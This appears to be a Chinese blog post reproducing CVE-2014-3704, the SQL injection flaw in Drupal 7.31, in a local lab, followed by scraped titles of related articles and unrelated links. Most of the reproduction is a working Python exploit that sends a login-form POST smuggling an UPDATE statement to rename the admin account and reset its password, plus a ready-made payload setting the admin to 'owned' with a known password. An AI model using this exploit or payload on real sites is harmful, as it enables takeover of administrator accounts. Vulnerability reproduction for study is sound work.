记录下自己的复现思路

漏洞影响:

Drupal 7.31

Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。

0x01漏洞复现

复现环境:

1) Apache2.4

2) Php 7.0

3) drupal 7.31 https://www.drupal.org/drupal-7.31-release-notes(点击下载)

环境打包在目录下安装即可

中间遇到的问题:

解决方法:关闭extersion=php_mbstring.dll(修改前注意备份原来的)

Exploit:

  

原先管理员帐号:root 密码:rootxxxx

import urllib2,sys

from drupalpass import DrupalHash

host = sys.argv[1]

user = sys.argv[2]

password = sys.argv[3]

if len(sys.argv) != 3:

    print "host username password"

    print "http://nope.io admin wowsecure"

hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()

target = '%s/?q=node&destination=node' % host

post_data = "name[0%20;update+users+set+name%3d\'" \

            +user \

            +"'+,+pass+%3d+'" \

            +hash[:55] \

            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"

content = urllib2.urlopen(url=target, data=post_data).read()

if "mb_strlen() expects parameter 1" in content:

        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

import hashlib

# Calculate a non-truncated Drupal 7 compatible password hash.

# The consumer of these hashes must truncate correctly.

class DrupalHash:

  def __init__(self, stored_hash, password):

    self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

    self.last_hash = self.rehash(stored_hash, password)

  def get_hash(self):

    return self.last_hash

  def password_get_count_log2(self, setting):

    return self.itoa64.index(setting[3])

  def password_crypt(self, algo, password, setting):

    setting = setting[0:12]

    if setting[0] != '$' or setting[2] != '$':

      return False

    count_log2 = self.password_get_count_log2(setting)

    salt = setting[4:12]

    if len(salt) < 8:

      return False

    count = 1 << count_log2

    if algo == 'md5':

      hash_func = hashlib.md5

    elif algo == 'sha512':

      hash_func = hashlib.sha512

    else:

      return False

    hash_str = hash_func(salt + password).digest()

    for c in range(count):

      hash_str = hash_func(hash_str + password).digest()

    output = setting + self.custom64(hash_str)

    return output

  def custom64(self, string, count = 0):

    if count == 0:

      count = len(string)

    output = ''

    i = 0

    itoa64 = self.itoa64

    while 1:

      value = ord(string[i])

      i += 1

      output += itoa64[value & 0x3f]

      if i < count:

        value |= ord(string[i]) << 8

      output += itoa64[(value >> 6) & 0x3f]

      if i >= count:

        break

      i += 1

      if i < count:

        value |= ord(string[i]) << 16

      output += itoa64[(value >> 12) & 0x3f]

      if i >= count:

        break

      i += 1

      output += itoa64[(value >> 18) & 0x3f]

      if i >= count:

        break

    return output

  def rehash(self, stored_hash, password):

    # Drupal 6 compatibility

    if len(stored_hash) == 32 and stored_hash.find('$') == -1:

      return hashlib.md5(password).hexdigest()

      # Drupal 7

    if stored_hash[0:2] == 'U$':

      stored_hash = stored_hash[1:]

      password = hashlib.md5(password).hexdigest()

    hash_type = stored_hash[0:3]

    if hash_type == '$S$':

      hash_str = self.password_crypt('sha512', password, stored_hash)

    elif hash_type == '$H$' or hash_type == '$P$':

      hash_str = self.password_crypt('md5', password, stored_hash)

    else:

      hash_str = False

    return hash_str

我这里编译不成功,打算换一种方法

http://127.0.0.1/drupal-7.31/node?destination=node

点击 login  这里post修改查询语句,插入update的sql语句直接更改管理员帐号密码。

这里的加密方式调用官方的password-hash.sh 去生成自己的hash

这里报错了。

找了两个网上的公开的hash去update 。

$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld   ---->thanks

$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s    --->P@55w0rd.

Payload:

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

  

直接update用户:owned 密码:P@55w0rd

从数据库查询回来的结果或者mysql的监控可以看到,管理员的用户名和密码都被重置。owned用户提升为管理员,并且密码设为P@55w0rd。

ref:

  • http://0day5.com/archives/2310/
  • http://www.freebuf.com/vuls/47690.html

[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现的更多相关文章

  1. Drupal 7.31 SQL注入漏洞利用具体解释及EXP

     有意迟几天放出来这篇文章以及程序,只是看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,只是说实话这个洞威力挺大的.当然.这也是Drupal本身没有意料到的. 0x00 首 ...

  2. PHPCMS \phpcms\modules\member\index.php 用户登陆SQL注入漏洞分析

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POC http://localhost/p ...

  3. Beescms_v4.0 sql注入漏洞分析

    Beescms_v4.0 sql注入漏洞分析 一.漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入. 二.漏洞环境搭建 1.官方下载 ...

  4. ThinkCMF X2.2.2多处SQL注入漏洞分析

       1.     漏洞描述 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本.最近刚好在渗透测试 ...

  5. DM企业建站系统v201710 sql注入漏洞分析 | 新版v201712依旧存在sql注入

    0x00 前言 本来呢,这套CMS都不想审的了.下载下来打开一看,各种debug注释,排版烂的不行. 贴几个页面看看 感觉像是新手练手的,没有审下去的欲望了. 但想了想,我tm就是新手啊,然后就继续看 ...

  6. Vtiger CRM 几处SQL注入漏洞分析,测试工程师可借鉴

    本文由云+社区发表 0x00 前言 干白盒审计有小半年了,大部分是业务上的代码,逻辑的复杂度和功能模块结构都比较简单,干久了收获也就一般,有机会接触一个成熟的产品(vtiger CRM)进行白盒审计, ...

  7. 【代码审计】五指CMS_v4.1.0 copyfrom.php 页面存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  8. 【代码审计】五指CMS_v4.1.0 后台存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  9. 【代码审计】大米CMS_V5.5.3 SQL注入漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

随机推荐

  1. Json API接口数据生成

    偶然发现,对前端数据模拟挺好用,没有跨域问题 https://myjson.com/

  2. Spring AOP和IOC(转载)

    spring 的优点?1.降低了组件之间的耦合性 ,实现了软件各层之间的解耦 2.可以使用容易提供的众多服务,如事务管理,消息服务等 3.容器提供单例模式支持 4.容器提供了AOP技术,利用它很容易实 ...

  3. 谈谈加载(Loading)的那点事

    谈谈加载(Loading)的那点事 2013/10/12 | 分类: 设计 | 0 条评论 | 标签: 交互设计, 加载 分享到:33 原文出处: 搜狐焦点 对于加载(loading),想必大家都不陌 ...

  4. jquery live hover

    $("table tr").live({ mouseenter: function() { //todo }, mouseleave: function() { //todo } ...

  5. CXF实战之自己定义拦截器(五)

    CXF已经内置了一些拦截器,这些拦截器大部分默认加入到拦截器链中,有些拦截器也能够手动加入,如手动加入CXF提供的日志拦截器.也能够自己定义拦截器.CXF中实现自己定义拦截器非常easy.仅仅要继承A ...

  6. 【BZOJ3837】[Pa2013]Filary 随机化神题

    [BZOJ3837][Pa2013]Filary Description 给定n个正整数,从中挑出k个数,满足:存在某一个m(m>=2),使得这k个数模m的余数相等. 求出k的最大值,并求出此时 ...

  7. LeetCode(83)Remove Duplicates from Sorted List

    题目 Given a sorted linked list, delete all duplicates such that each element appear only once. For ex ...

  8. linux杂谈(十四):ftp的企业应用级的配置(一)

    版权声明:本文为博主原创文章.未经博主同意不得转载. https://blog.csdn.net/linux_player_c/article/details/24869877 1.ftp简单介绍 ( ...

  9. java URI 编码解码

    import java.io.UnsupportedEncodingException; /** * url转码.解码 */ public class UrlUtil { private final ...

  10. Java 符号引用 与 直接引用

    在类的加载过程中的解析阶段,Java虚拟机会把类的二进制数据中的符号引用 替换为 直接引用,如Worker类中一个方法: public void gotoWork(){ car.run(); //这段 ...